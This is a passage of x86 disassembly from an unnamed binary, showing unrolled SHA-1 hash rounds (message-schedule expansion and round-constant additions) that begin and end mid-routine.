CODE:004026C1 xor [esp+280h+var_2e0], ebx CODE:004026C5 mov [esp+280h+_temp_buffer], eax CODE:004026CC add ecx, [esp+280h+var_2e0] CODE:004026D0 ror ebp, 2 CODE:004026D3 lea ecx, [ecx+eax+6ed9eba1h] CODE:004026DA mov [esp+280h+var_2e0], ecx CODE:004026DE mov eax, [esp+280h+var_4a8] CODE:004026E5 rol [esp+280h+var_2e0], 5 CODE:004026EA xor eax, [esp+280h+var_4bc] CODE:004026F1 add ebx, [esp+280h+var_2e0] CODE:004026F5 xor eax, [esp+280h+var_4d4] CODE:004026FC mov [esp+280h+var_2e0], edx CODE:00402700 xor eax, [esp+280h+var_4dc] CODE:00402707 xor [esp+280h+var_2e0], ebp CODE:0040270B rol eax, 1 CODE:0040270D xor [esp+280h+var_2e0], edi CODE:00402711 mov [esp+280h+var_4dc], eax CODE:00402718 add ebx, [esp+280h+var_2e0] CODE:0040271C ror edx, 2 CODE:0040271F lea ebx, [ebx+eax+6ed9eba1h] CODE:00402726 mov [esp+280h+var_2e0], ebx CODE:0040272A mov eax, [esp+280h+var_4a4] CODE:00402731 rol [esp+280h+var_2e0], 5 CODE:00402736 xor eax, [esp+280h+var_4b8] CODE:0040273D add edi, [esp+280h+var_2e0] CODE:00402741 xor eax, [esp+280h+var_4d0] CODE:00402748 mov [esp+280h+var_2e0], ecx CODE:0040274C xor eax, [esp+280h+var_4d8] CODE:00402753 xor [esp+280h+var_2e0], edx CODE:00402757 rol eax, 1 CODE:00402759 xor [esp+280h+var_2e0], ebp CODE:0040275D mov [esp+280h+var_4d8], eax CODE:00402764 add edi, [esp+280h+var_2e0] CODE:00402768 ror ecx, 2 CODE:0040276B lea edi, [edi+eax+6ed9eba1h] CODE:00402772 mov [esp+280h+var_2e0], edi CODE:00402776 mov eax, [esp+280h+_temp_buffer] CODE:0040277D rol [esp+280h+var_2e0], 5 CODE:00402782 xor eax, [esp+280h+var_4b4] CODE:00402789 add ebp, [esp+280h+var_2e0] CODE:0040278D xor eax, [esp+280h+var_4cc] CODE:00402794 mov [esp+280h+var_2e0], ebx CODE:00402798 xor eax, [esp+280h+var_4d4] CODE:0040279F xor [esp+280h+var_2e0], ecx CODE:004027A3 rol eax, 1 CODE:004027A5 xor [esp+280h+var_2e0], edx CODE:004027A9 mov [esp+280h+var_4d4], eax CODE:004027B0 add ebp, [esp+280h+var_2e0] CODE:004027B4 ror ebx, 2 CODE:004027B7 lea ebp, [ebp+eax+6ed9eba1h] CODE:004027BE mov [esp+280h+var_2e0], ebp CODE:004027C2 mov eax, [esp+280h+var_4dc] CODE:004027C9 rol [esp+280h+var_2e0], 5 CODE:004027CE xor eax, [esp+280h+var_4b0] CODE:004027D5 add edx, [esp+280h+var_2e0] CODE:004027D9 xor eax, [esp+280h+var_4c8] CODE:004027E0 mov [esp+280h+var_2e0], edi

CODE:004027E4 xor eax, [esp+280h+var_4d0] CODE:004027EB xor [esp+280h+var_2e0], ebx CODE:004027EF rol eax, 1 CODE:004027F1 xor [esp+280h+var_2e0], ecx CODE:004027F5 mov [esp+280h+var_4d0], eax CODE:004027FC add edx, [esp+280h+var_2e0] CODE:00402800 ror edi, 2 CODE:00402803 lea edx, [edx+eax+6ed9eba1h] CODE:0040280A mov [esp+280h+var_2e0], edx CODE:0040280E mov eax, [esp+280h+var_4d8] CODE:00402815 rol [esp+280h+var_2e0], 5 CODE:0040281A xor eax, [esp+280h+var_4ac] CODE:00402821 add ecx, [esp+280h+var_2e0] CODE:00402825 xor eax, [esp+280h+var_4c4] CODE:0040282C mov [esp+280h+var_2e0], ebp CODE:00402830 xor eax, [esp+280h+var_4cc] CODE:00402837 xor [esp+280h+var_2e0], edi CODE:0040283B rol eax, 1 CODE:0040283D xor [esp+280h+var_2e0], ebx CODE:00402841 mov [esp+280h+var_4cc], eax CODE:00402848 add ecx, [esp+280h+var_2e0] CODE:0040284C ror ebp, 2 CODE:0040284F lea ecx, [ecx+eax+6ed9eba1h] CODE:00402856 mov [esp+280h+var_2e0], ecx CODE:0040285A mov eax, [esp+280h+var_4d4] CODE:00402861 rol [esp+280h+var_2e0], 5 CODE:00402866 xor eax, [esp+280h+var_4a8] CODE:0040286D add ebx, [esp+280h+var_2e0] CODE:00402871 xor eax, [esp+280h+var_4c0] CODE:00402878 mov [esp+280h+var_2e0], edx CODE:0040287C xor eax, [esp+280h+var_4c8] CODE:00402883 xor [esp+280h+var_2e0], ebp CODE:00402887 rol eax, 1 CODE:00402889 xor [esp+280h+var_2e0], edi CODE:0040288D mov [esp+280h+var_4c8], eax CODE:00402894 add ebx, [esp+280h+var_2e0] CODE:00402898 ror edx, 2 CODE:0040289B lea ebx, [ebx+eax+6ed9eba1h] CODE:004028A2 mov [esp+280h+var_2e0], ebx CODE:004028A6 mov eax, [esp+280h+var_4d0] CODE:004028AD rol [esp+280h+var_2e0], 5 CODE:004028B2 xor eax, [esp+280h+var_4a4] CODE:004028B9 add edi, [esp+280h+var_2e0] CODE:004028BD xor eax, [esp+280h+var_4bc] CODE:004028C4 mov [esp+280h+var_2e0], ecx CODE:004028C8 xor eax, [esp+280h+var_4c4] CODE:004028CF xor [esp+280h+var_2e0], edx CODE:004028D3 rol eax, 1 CODE:004028D5 xor [esp+280h+var_2e0], ebp CODE:004028D9 mov [esp+280h+var_4c4], eax CODE:004028E0 add edi, [esp+280h+var_2e0] CODE:004028E4 ror ecx, 2 CODE:004028E7 lea edi, [edi+eax+6ed9eba1h] CODE:004028EE mov [esp+280h+var_2e0], edi CODE:004028F2 mov eax, [esp+280h+var_4cc] CODE:004028F9 rol [esp+280h+var_2e0], 5 CODE:004028FE xor eax, [esp+280h+_temp_buffer]

CODE:00402905 add ebp, [esp+280h+var_2e0] CODE:00402909 xor eax, [esp+280h+var_4b8] CODE:00402910 mov [esp+280h+var_2e0], ebx CODE:00402914 xor eax, [esp+280h+var_4c0] CODE:0040291B or [esp+280h+var_2e0], ecx CODE:0040291F rol eax, 1 CODE:00402921 and [esp+280h+var_2e0], edx CODE:00402925 mov [esp+280h+var_4c0], eax CODE:0040292C add ebp, eax CODE:0040292E mov eax, ebx CODE:00402930 and eax, ecx CODE:00402932 or eax, [esp+280h+var_2e0] CODE:00402936 ror ebx, 2 CODE:00402939 lea ebp, [ebp+eax-70e44324h] CODE:00402940 mov [esp+280h+var_2e0], ebp CODE:00402944 mov eax, [esp+280h+var_4c8] CODE:0040294B rol [esp+280h+var_2e0], 5 CODE:00402950 xor eax, [esp+280h+var_4dc] CODE:00402957 add edx, [esp+280h+var_2e0] CODE:0040295B xor eax, [esp+280h+var_4b4] CODE:00402962 mov [esp+280h+var_2e0], edi CODE:00402966 xor eax, [esp+280h+var_4bc] CODE:0040296D or [esp+280h+var_2e0], ebx CODE:00402971 rol eax, 1 CODE:00402973 and [esp+280h+var_2e0], ecx CODE:00402977 mov [esp+280h+var_4bc], eax CODE:0040297E add edx, eax CODE:00402980 mov eax, edi CODE:00402982 and eax, ebx CODE:00402984 or eax, [esp+280h+var_2e0] CODE:00402988 ror edi, 2 CODE:0040298B lea edx, [edx+eax-70e44324h] CODE:00402992 mov [esp+280h+var_2e0], edx CODE:00402996 mov eax, [esp+280h+var_4c4] CODE:0040299D rol [esp+280h+var_2e0], 5 CODE:004029A2 xor eax, [esp+280h+var_4d8] CODE:004029A9 add ecx, [esp+280h+var_2e0] CODE:004029AD xor eax, [esp+280h+var_4b0] CODE:004029B4 mov [esp+280h+var_2e0], ebp CODE:004029B8 xor eax, [esp+280h+var_4b8] CODE:004029BF or [esp+280h+var_2e0], edi CODE:004029C3 rol eax, 1 CODE:004029C5 and [esp+280h+var_2e0], ebx CODE:004029C9 mov [esp+280h+var_4b8], eax CODE:004029D0 add ecx, eax CODE:004029D2 mov eax, ebp CODE:004029D4 and eax, edi CODE:004029D6 or eax, [esp+280h+var_2e0] CODE:004029DA ror ebp, 2 CODE:004029DD lea ecx, [ecx+eax-70e44324h] CODE:004029E4 mov [esp+280h+var_2e0], ecx CODE:004029E8 mov eax, [esp+280h+var_4c0] CODE:004029EF rol [esp+280h+var_2e0], 5 CODE:004029F4 xor eax, [esp+280h+var_4d4] CODE:004029FB add ebx, [esp+280h+var_2e0] CODE:004029FF xor eax, [esp+280h+var_4ac] CODE:00402A06 mov [esp+280h+var_2e0], edx

CODE:00402A0A xor eax, [esp+280h+var_4b4] CODE:00402A11 or [esp+280h+var_2e0], ebp CODE:00402A15 rol eax, 1 CODE:00402A17 and [esp+280h+var_2e0], edi CODE:00402A1B mov [esp+280h+var_4b4], eax CODE:00402A22 add ebx, eax CODE:00402A24 mov eax, edx CODE:00402A26 and eax, ebp CODE:00402A28 or eax, [esp+280h+var_2e0] CODE:00402A2C ror edx, 2 CODE:00402A2F lea ebx, [ebx+eax-70e44324h] CODE:00402A36 mov [esp+280h+var_2e0], ebx CODE:00402A3A mov eax, [esp+280h+var_4bc] CODE:00402A41 rol [esp+280h+var_2e0], 5 CODE:00402A46 xor eax, [esp+280h+var_4d0] CODE:00402A4D add edi, [esp+280h+var_2e0] CODE:00402A51 xor eax, [esp+280h+var_4a8] CODE:00402A58 mov [esp+280h+var_2e0], ecx CODE:00402A5C xor eax, [esp+280h+var_4b0] CODE:00402A63 or [esp+280h+var_2e0], edx CODE:00402A67 rol eax, 1 CODE:00402A69 and [esp+280h+var_2e0], ebp CODE:00402A6D mov [esp+280h+var_4b0], eax CODE:00402A74 add edi, eax CODE:00402A76 mov eax, ecx CODE:00402A78 and eax, edx CODE:00402A7A or eax, [esp+280h+var_2e0] CODE:00402A7E ror ecx, 2 CODE:00402A81 lea edi, [edi+eax-70e44324h] CODE:00402A88 mov [esp+280h+var_2e0], edi CODE:00402A8C mov eax, [esp+280h+var_4b8] CODE:00402A93 rol [esp+280h+var_2e0], 5 CODE:00402A98 xor eax, [esp+280h+var_4cc] CODE:00402A9F add ebp, [esp+280h+var_2e0] CODE:00402AA3 xor eax, [esp+280h+var_4a4] CODE:00402AAA mov [esp+280h+var_2e0], ebx CODE:00402AAE xor eax, [esp+280h+var_4ac] CODE:00402AB5 or [esp+280h+var_2e0], ecx CODE:00402AB9 rol eax, 1 CODE:00402ABB and [esp+280h+var_2e0], edx CODE:00402ABF mov [esp+280h+var_4ac], eax CODE:00402AC6 add ebp, eax CODE:00402AC8 mov eax, ebx CODE:00402ACA and eax, ecx CODE:00402ACC or eax, [esp+280h+var_2e0] CODE:00402AD0 ror ebx, 2 CODE:00402AD3 lea ebp, [ebp+eax-70e44324h] CODE:00402ADA mov [esp+280h+var_2e0], ebp CODE:00402ADE mov eax, [esp+280h+var_4b4] CODE:00402AE5 rol [esp+280h+var_2e0], 5 CODE:00402AEA xor eax, [esp+280h+var_4c8] CODE:00402AF1 add edx, [esp+280h+var_2e0] CODE:00402AF5 xor eax, [esp+280h+_temp_buffer] CODE:00402AFC mov [esp+280h+var_2e0], edi CODE:00402B00 xor eax, [esp+280h+var_4a8] CODE:00402B07 or [esp+280h+var_2e0], ebx CODE:00402B0B rol eax, 1

CODE:00402B0D and [esp+280h+var_2e0], ecx CODE:00402B11 mov [esp+280h+var_4a8], eax CODE:00402B18 add edx, eax CODE:00402B1A mov eax, edi CODE:00402B1C and eax, ebx CODE:00402B1E or eax, [esp+280h+var_2e0] CODE:00402B22 ror edi, 2 CODE:00402B25 lea edx, [edx+eax-70e44324h] CODE:00402B2C mov [esp+280h+var_2e0], edx CODE:00402B30 mov eax, [esp+280h+var_4b0] CODE:00402B37 rol [esp+280h+var_2e0], 5 CODE:00402B3C xor eax, [esp+280h+var_4c4] CODE:00402B43 add ecx, [esp+280h+var_2e0] CODE:00402B47 xor eax, [esp+280h+var_4dc] CODE:00402B4E mov [esp+280h+var_2e0], ebp CODE:00402B52 xor eax, [esp+280h+var_4a4] CODE:00402B59 or [esp+280h+var_2e0], edi CODE:00402B5D rol eax, 1 CODE:00402B5F and [esp+280h+var_2e0], ebx CODE:00402B63 mov [esp+280h+var_4a4], eax CODE:00402B6A add ecx, eax CODE:00402B6C mov eax, ebp CODE:00402B6E and eax, edi CODE:00402B70 or eax, [esp+280h+var_2e0] CODE:00402B74 ror ebp, 2 CODE:00402B77 lea ecx, [ecx+eax-70e44324h] CODE:00402B7E mov [esp+280h+var_2e0], ecx CODE:00402B82 mov eax, [esp+280h+var_4ac] CODE:00402B89 rol [esp+280h+var_2e0], 5 CODE:00402B8E xor eax, [esp+280h+var_4c0] CODE:00402B95 add ebx, [esp+280h+var_2e0] CODE:00402B99 xor eax, [esp+280h+var_4d8] CODE:00402BA0 mov [esp+280h+var_2e0], edx CODE:00402BA4 xor eax, [esp+280h+_temp_buffer] CODE:00402BAB or [esp+280h+var_2e0], ebp CODE:00402BAF rol eax, 1 CODE:00402BB1 and [esp+280h+var_2e0], edi CODE:00402BB5 mov [esp+280h+_temp_buffer], eax CODE:00402BBC add ebx, eax CODE:00402BBE mov eax, edx CODE:00402BC0 and eax, ebp CODE:00402BC2 or eax, [esp+280h+var_2e0] CODE:00402BC6 ror edx, 2 CODE:00402BC9 lea ebx, [ebx+eax-70e44324h] CODE:00402BD0 mov [esp+280h+var_2e0], ebx CODE:00402BD4 mov eax, [esp+280h+var_4a8] CODE:00402BDB rol [esp+280h+var_2e0], 5 CODE:00402BE0 xor eax, [esp+280h+var_4bc] CODE:00402BE7 add edi, [esp+280h+var_2e0] CODE:00402BEB xor eax, [esp+280h+var_4d4] CODE:00402BF2 mov [esp+280h+var_2e0], ecx CODE:00402BF6 xor eax, [esp+280h+var_4dc] CODE:00402BFD or [esp+280h+var_2e0], edx CODE:00402C01 rol eax, 1 CODE:00402C03 and [esp+280h+var_2e0], ebp CODE:00402C07 mov [esp+280h+var_4dc], eax CODE:00402C0E add edi, eax

CODE:00402C10 mov eax, ecx CODE:00402C12 and eax, edx CODE:00402C14 or eax, [esp+280h+var_2e0] CODE:00402C18 ror ecx, 2 CODE:00402C1B lea edi, [edi+eax-70e44324h] CODE:00402C22 mov [esp+280h+var_2e0], edi CODE:00402C26 mov eax, [esp+280h+var_4a4] CODE:00402C2D rol [esp+280h+var_2e0], 5 CODE:00402C32 xor eax, [esp+280h+var_4b8] CODE:00402C39 add ebp, [esp+280h+var_2e0] CODE:00402C3D xor eax, [esp+280h+var_4d0] CODE:00402C44 mov [esp+280h+var_2e0], ebx CODE:00402C48 xor eax, [esp+280h+var_4d8] CODE:00402C4F or [esp+280h+var_2e0], ecx CODE:00402C53 rol eax, 1 CODE:00402C55 and [esp+280h+var_2e0], edx CODE:00402C59 mov [esp+280h+var_4d8], eax CODE:00402C60 add ebp, eax CODE:00402C62 mov eax, ebx CODE:00402C64 and eax, ecx CODE:00402C66 or eax, [esp+280h+var_2e0] CODE:00402C6A ror ebx, 2 CODE:00402C6D lea ebp, [ebp+eax-70e44324h] CODE:00402C74 mov [esp+280h+var_2e0], ebp CODE:00402C78 mov eax, [esp+280h+_temp_buffer] CODE:00402C7F rol [esp+280h+var_2e0], 5 CODE:00402C84 xor eax, [esp+280h+var_4b4] CODE:00402C8B add edx, [esp+280h+var_2e0] CODE:00402C8F xor eax, [esp+280h+var_4cc] CODE:00402C96 mov [esp+280h+var_2e0], edi CODE:00402C9A xor eax, [esp+280h+var_4d4] CODE:00402CA1 or [esp+280h+var_2e0], ebx CODE:00402CA5 rol eax, 1 CODE:00402CA7 and [esp+280h+var_2e0], ecx CODE:00402CAB mov [esp+280h+var_4d4], eax CODE:00402CB2 add edx, eax CODE:00402CB4 mov eax, edi CODE:00402CB6 and eax, ebx CODE:00402CB8 or eax, [esp+280h+var_2e0] CODE:00402CBC ror edi, 2 CODE:00402CBF lea edx, [edx+eax-70e44324h] CODE:00402CC6 mov [esp+280h+var_2e0], edx CODE:00402CCA mov eax, [esp+280h+var_4dc] CODE:00402CD1 rol [esp+280h+var_2e0], 5 CODE:00402CD6 xor eax, [esp+280h+var_4b0] CODE:00402CDD add ecx, [esp+280h+var_2e0] CODE:00402CE1 xor eax, [esp+280h+var_4c8] CODE:00402CE8 mov [esp+280h+var_2e0], ebp CODE:00402CEC xor eax, [esp+280h+var_4d0] CODE:00402CF3 or [esp+280h+var_2e0], edi CODE:00402CF7 rol eax, 1 CODE:00402CF9 and [esp+280h+var_2e0], ebx CODE:00402CFD mov [esp+280h+var_4d0], eax CODE:00402D04 add ecx, eax CODE:00402D06 mov eax, ebp CODE:00402D08 and eax, edi CODE:00402D0A or eax, [esp+280h+var_2e0]

CODE:00402D0E ror ebp, 2 CODE:00402D11 lea ecx, [ecx+eax-70e44324h] CODE:00402D18 mov [esp+280h+var_2e0], ecx CODE:00402D1C mov eax, [esp+280h+var_4d8] CODE:00402D23 rol [esp+280h+var_2e0], 5 CODE:00402D28 xor eax, [esp+280h+var_4ac] CODE:00402D2F add ebx, [esp+280h+var_2e0] CODE:00402D33 xor eax, [esp+280h+var_4c4] CODE:00402D3A mov [esp+280h+var_2e0], edx CODE:00402D3E xor eax, [esp+280h+var_4cc] CODE:00402D45 or [esp+280h+var_2e0], ebp CODE:00402D49 rol eax, 1 CODE:00402D4B and [esp+280h+var_2e0], edi CODE:00402D4F mov [esp+280h+var_4cc], eax CODE:00402D56 add ebx, eax CODE:00402D58 mov eax, edx CODE:00402D5A and eax, ebp CODE:00402D5C or eax, [esp+280h+var_2e0] CODE:00402D60 ror edx, 2 CODE:00402D63 lea ebx, [ebx+eax-70e44324h] CODE:00402D6A mov [esp+280h+var_2e0], ebx CODE:00402D6E mov eax, [esp+280h+var_4d4] CODE:00402D75 rol [esp+280h+var_2e0], 5 CODE:00402D7A xor eax, [esp+280h+var_4a8] CODE:00402D81 add edi, [esp+280h+var_2e0] CODE:00402D85 xor eax, [esp+280h+var_4c0] CODE:00402D8C mov [esp+280h+var_2e0], ecx CODE:00402D90 xor eax, [esp+280h+var_4c8] CODE:00402D97 or [esp+280h+var_2e0], edx CODE:00402D9B rol eax, 1 CODE:00402D9D and [esp+280h+var_2e0], ebp CODE:00402DA1 mov [esp+280h+var_4c8], eax CODE:00402DA8 add edi, eax CODE:00402DAA mov eax, ecx CODE:00402DAC and eax, edx CODE:00402DAE or eax, [esp+280h+var_2e0] CODE:00402DB2 ror ecx, 2 CODE:00402DB5 lea edi, [edi+eax-70e44324h] CODE:00402DBC mov [esp+280h+var_2e0], edi CODE:00402DC0 mov eax, [esp+280h+var_4d0] CODE:00402DC7 rol [esp+280h+var_2e0], 5 CODE:00402DCC xor eax, [esp+280h+var_4a4] CODE:00402DD3 add ebp, [esp+280h+var_2e0] CODE:00402DD7 xor eax, [esp+280h+var_4bc] CODE:00402DDE mov [esp+280h+var_2e0], ebx CODE:00402DE2 xor eax, [esp+280h+var_4c4] CODE:00402DE9 or [esp+280h+var_2e0], ecx CODE:00402DED rol eax, 1 CODE:00402DEF and [esp+280h+var_2e0], edx CODE:00402DF3 mov [esp+280h+var_4c4], eax CODE:00402DFA add ebp, eax CODE:00402DFC mov eax, ebx CODE:00402DFE and eax, ecx CODE:00402E00 or eax, [esp+280h+var_2e0] CODE:00402E04 ror ebx, 2 CODE:00402E07 lea ebp, [ebp+eax-70e44324h] CODE:00402E0E mov [esp+280h+var_2e0], ebp

CODE:00402E12 mov eax, [esp+280h+var_4cc] CODE:00402E19 rol [esp+280h+var_2e0], 5 CODE:00402E1E xor eax, [esp+280h+_temp_buffer] CODE:00402E25 add edx, [esp+280h+var_2e0] CODE:00402E29 xor eax, [esp+280h+var_4b8] CODE:00402E30 mov [esp+280h+var_2e0], edi CODE:00402E34 xor eax, [esp+280h+var_4c0] CODE:00402E3B or [esp+280h+var_2e0], ebx CODE:00402E3F rol eax, 1 CODE:00402E41 and [esp+280h+var_2e0], ecx CODE:00402E45 mov [esp+280h+var_4c0], eax CODE:00402E4C add edx, eax CODE:00402E4E mov eax, edi CODE:00402E50 and eax, ebx CODE:00402E52 or eax, [esp+280h+var_2e0] CODE:00402E56 ror edi, 2 CODE:00402E59 lea edx, [edx+eax-70e44324h] CODE:00402E60 mov [esp+280h+var_2e0], edx CODE:00402E64 mov eax, [esp+280h+var_4c8] CODE:00402E6B rol [esp+280h+var_2e0], 5 CODE:00402E70 xor eax, [esp+280h+var_4dc] CODE:00402E77 add ecx, [esp+280h+var_2e0] CODE:00402E7B xor eax, [esp+280h+var_4b4] CODE:00402E82 mov [esp+280h+var_2e0], ebp CODE:00402E86 xor eax, [esp+280h+var_4bc] CODE:00402E8D or [esp+280h+var_2e0], edi CODE:00402E91 rol eax, 1 CODE:00402E93 and [esp+280h+var_2e0], ebx CODE:00402E97 mov [esp+280h+var_4bc], eax CODE:00402E9E add ecx, eax CODE:00402EA0 mov eax, ebp CODE:00402EA2 and eax, edi CODE:00402EA4 or eax, [esp+280h+var_2e0] CODE:00402EA8 ror ebp, 2 CODE:00402EAB lea ecx, [ecx+eax-70e44324h] CODE:00402EB2 mov [esp+280h+var_2e0], ecx CODE:00402EB6 mov eax, [esp+280h+var_4c4] CODE:00402EBD rol [esp+280h+var_2e0], 5 CODE:00402EC2 xor eax, [esp+280h+var_4d8] CODE:00402EC9 add ebx, [esp+280h+var_2e0] CODE:00402ECD xor eax, [esp+280h+var_4b0] CODE:00402ED4 mov [esp+280h+var_2e0], edx CODE:00402ED8 xor eax, [esp+280h+var_4b8] CODE:00402EDF or [esp+280h+var_2e0], ebp CODE:00402EE3 rol eax, 1 CODE:00402EE5 and [esp+280h+var_2e0], edi CODE:00402EE9 mov [esp+280h+var_4b8], eax CODE:00402EF0 add ebx, eax CODE:00402EF2 mov eax, edx CODE:00402EF4 and eax, ebp CODE:00402EF6 or eax, [esp+280h+var_2e0] CODE:00402EFA ror edx, 2 CODE:00402EFD lea ebx, [ebx+eax-70e44324h] CODE:00402F04 mov [esp+280h+var_2e0], ebx CODE:00402F08 mov eax, [esp+280h+var_4c0] CODE:00402F0F rol [esp+280h+var_2e0], 5 CODE:00402F14 xor eax, [esp+280h+var_4d4]

CODE:00402F1B add edi, [esp+280h+var_2e0] CODE:00402F1F xor eax, [esp+280h+var_4ac] CODE:00402F26 mov [esp+280h+var_2e0], ecx CODE:00402F2A xor eax, [esp+280h+var_4b4] CODE:00402F31 or [esp+280h+var_2e0], edx CODE:00402F35 rol eax, 1 CODE:00402F37 and [esp+280h+var_2e0], ebp CODE:00402F3B mov [esp+280h+var_4b4], eax CODE:00402F42 add edi, eax CODE:00402F44 mov eax, ecx CODE:00402F46 and eax, edx CODE:00402F48 or eax, [esp+280h+var_2e0] CODE:00402F4C ror ecx, 2 CODE:00402F4F lea edi, [edi+eax-70e44324h] CODE:00402F56 mov [esp+280h+var_2e0], edi CODE:00402F5A mov eax, [esp+280h+var_4bc] CODE:00402F61 rol [esp+280h+var_2e0], 5 CODE:00402F66 xor eax, [esp+280h+var_4d0] CODE:00402F6D add ebp, [esp+280h+var_2e0] CODE:00402F71 xor eax, [esp+280h+var_4a8] CODE:00402F78 mov [esp+280h+var_2e0], ebx CODE:00402F7C xor eax, [esp+280h+var_4b0] CODE:00402F83 xor [esp+280h+var_2e0], ecx CODE:00402F87 rol eax, 1 CODE:00402F89 xor [esp+280h+var_2e0], edx CODE:00402F8D mov [esp+280h+var_4b0], eax CODE:00402F94 add ebp, [esp+280h+var_2e0] CODE:00402F98 ror ebx, 2 CODE:00402F9B lea ebp, [ebp+eax-359d3e2ah] CODE:00402FA2 mov [esp+280h+var_2e0], ebp CODE:00402FA6 mov eax, [esp+280h+var_4b8] CODE:00402FAD rol [esp+280h+var_2e0], 5 CODE:00402FB2 xor eax, [esp+280h+var_4cc] CODE:00402FB9 add edx, [esp+280h+var_2e0] CODE:00402FBD xor eax, [esp+280h+var_4a4] CODE:00402FC4 mov [esp+280h+var_2e0], edi CODE:00402FC8 xor eax, [esp+280h+var_4ac] CODE:00402FCF xor [esp+280h+var_2e0], ebx CODE:00402FD3 rol eax, 1 CODE:00402FD5 xor [esp+280h+var_2e0], ecx CODE:00402FD9 mov [esp+280h+var_4ac], eax CODE:00402FE0 add edx, [esp+280h+var_2e0] CODE:00402FE4 ror edi, 2 CODE:00402FE7 lea edx, [edx+eax-359d3e2ah] CODE:00402FEE mov [esp+280h+var_2e0], edx CODE:00402FF2 mov eax, [esp+280h+var_4b4] CODE:00402FF9 rol [esp+280h+var_2e0], 5 CODE:00402FFE xor eax, [esp+280h+var_4c8] CODE:00403005 add ecx, [esp+280h+var_2e0] CODE:00403009 xor eax, [esp+280h+_temp_buffer] CODE:00403010 mov [esp+280h+var_2e0], ebp CODE:00403014 xor eax, [esp+280h+var_4a8] CODE:0040301B xor [esp+280h+var_2e0], edi CODE:0040301F rol eax, 1 CODE:00403021 xor [esp+280h+var_2e0], ebx CODE:00403025 mov [esp+280h+var_4a8], eax CODE:0040302C add ecx, [esp+280h+var_2e0]

CODE:00403030 ror ebp, 2 CODE:00403033 lea ecx, [ecx+eax-359d3e2ah] CODE:0040303A mov [esp+280h+var_2e0], ecx CODE:0040303E mov eax, [esp+280h+var_4b0] CODE:00403045 rol [esp+280h+var_2e0], 5 CODE:0040304A xor eax, [esp+280h+var_4c4] CODE:00403051 add ebx, [esp+280h+var_2e0] CODE:00403055 xor eax, [esp+280h+var_4dc] CODE:0040305C mov [esp+280h+var_2e0], edx CODE:00403060 xor eax, [esp+280h+var_4a4] CODE:00403067 xor [esp+280h+var_2e0], ebp CODE:0040306B rol eax, 1 CODE:0040306D xor [esp+280h+var_2e0], edi CODE:00403071 mov [esp+280h+var_4a4], eax CODE:00403078 add ebx, [esp+280h+var_2e0] CODE:0040307C ror edx, 2 CODE:0040307F lea ebx, [ebx+eax-359d3e2ah] CODE:00403086 mov [esp+280h+var_2e0], ebx CODE:0040308A mov eax, [esp+280h+var_4ac] CODE:00403091 rol [esp+280h+var_2e0], 5 CODE:00403096 xor eax, [esp+280h+var_4c0] CODE:0040309D add edi, [esp+280h+var_2e0] CODE:004030A1 xor eax, [esp+280h+var_4d8] CODE:004030A8 mov [esp+280h+var_2e0], ecx CODE:004030AC xor eax, [esp+280h+_temp_buffer] CODE:004030B3 xor [esp+280h+var_2e0], edx CODE:004030B7 rol eax, 1 CODE:004030B9 xor [esp+280h+var_2e0], ebp CODE:004030BD mov [esp+280h+_temp_buffer], eax CODE:004030C4 add edi, [esp+280h+var_2e0] CODE:004030C8 ror ecx, 2 CODE:004030CB lea edi, [edi+eax-359d3e2ah] CODE:004030D2 mov [esp+280h+var_2e0], edi CODE:004030D6 mov eax, [esp+280h+var_4a8] CODE:004030DD rol [esp+280h+var_2e0], 5 CODE:004030E2 xor eax, [esp+280h+var_4bc] CODE:004030E9 add ebp, [esp+280h+var_2e0] CODE:004030ED xor eax, [esp+280h+var_4d4] CODE:004030F4 mov [esp+280h+var_2e0], ebx CODE:004030F8 xor eax, [esp+280h+var_4dc] CODE:004030FF xor [esp+280h+var_2e0], ecx CODE:00403103 rol eax, 1 CODE:00403105 xor [esp+280h+var_2e0], edx CODE:00403109 mov [esp+280h+var_4dc], eax CODE:00403110 add ebp, [esp+280h+var_2e0] CODE:00403114 ror ebx, 2 CODE:00403117 lea ebp, [ebp+eax-359d3e2ah] CODE:0040311E mov [esp+280h+var_2e0], ebp CODE:00403122 mov eax, [esp+280h+var_4a4] CODE:00403129 rol [esp+280h+var_2e0], 5 CODE:0040312E xor eax, [esp+280h+var_4b8] CODE:00403135 add edx, [esp+280h+var_2e0] CODE:00403139 xor eax, [esp+280h+var_4d0] CODE:00403140 mov [esp+280h+var_2e0], edi CODE:00403144 xor eax, [esp+280h+var_4d8] CODE:0040314B xor [esp+280h+var_2e0], ebx CODE:0040314F rol eax, 1

CODE:00403151 xor [esp+280h+var_2e0], ecx CODE:00403155 mov [esp+280h+var_4d8], eax CODE:0040315C add edx, [esp+280h+var_2e0] CODE:00403160 ror edi, 2 CODE:00403163 lea edx, [edx+eax-359d3e2ah] CODE:0040316A mov [esp+280h+var_2e0], edx CODE:0040316E mov eax, [esp+280h+_temp_buffer] CODE:00403175 rol [esp+280h+var_2e0], 5 CODE:0040317A xor eax, [esp+280h+var_4b4] CODE:00403181 add ecx, [esp+280h+var_2e0] CODE:00403185 xor eax, [esp+280h+var_4cc] CODE:0040318C mov [esp+280h+var_2e0], ebp CODE:00403190 xor eax, [esp+280h+var_4d4] CODE:00403197 xor [esp+280h+var_2e0], edi CODE:0040319B rol eax, 1 CODE:0040319D xor [esp+280h+var_2e0], ebx CODE:004031A1 mov [esp+280h+var_4d4], eax CODE:004031A8 add ecx, [esp+280h+var_2e0] CODE:004031AC ror ebp, 2 CODE:004031AF lea ecx, [ecx+eax-359d3e2ah] CODE:004031B6 mov [esp+280h+var_2e0], ecx CODE:004031BA mov eax, [esp+280h+var_4dc] CODE:004031C1 rol [esp+280h+var_2e0], 5 CODE:004031C6 xor eax, [esp+280h+var_4b0] CODE:004031CD add ebx, [esp+280h+var_2e0] CODE:004031D1 xor eax, [esp+280h+var_4c8] CODE:004031D8 mov [esp+280h+var_2e0], edx CODE:004031DC xor eax, [esp+280h+var_4d0] CODE:004031E3 xor [esp+280h+var_2e0], ebp CODE:004031E7 rol eax, 1 CODE:004031E9 xor [esp+280h+var_2e0], edi CODE:004031ED mov [esp+280h+var_4d0], eax CODE:004031F4 add ebx, [esp+280h+var_2e0] CODE:004031F8 ror edx, 2 CODE:004031FB lea ebx, [ebx+eax-359d3e2ah] CODE:00403202 mov [esp+280h+var_2e0], ebx CODE:00403206 mov eax, [esp+280h+var_4d8] CODE:0040320D rol [esp+280h+var_2e0], 5 CODE:00403212 xor eax, [esp+280h+var_4ac] CODE:00403219 add edi, [esp+280h+var_2e0] CODE:0040321D xor eax, [esp+280h+var_4c4] CODE:00403224 mov [esp+280h+var_2e0], ecx CODE:00403228 xor eax, [esp+280h+var_4cc] 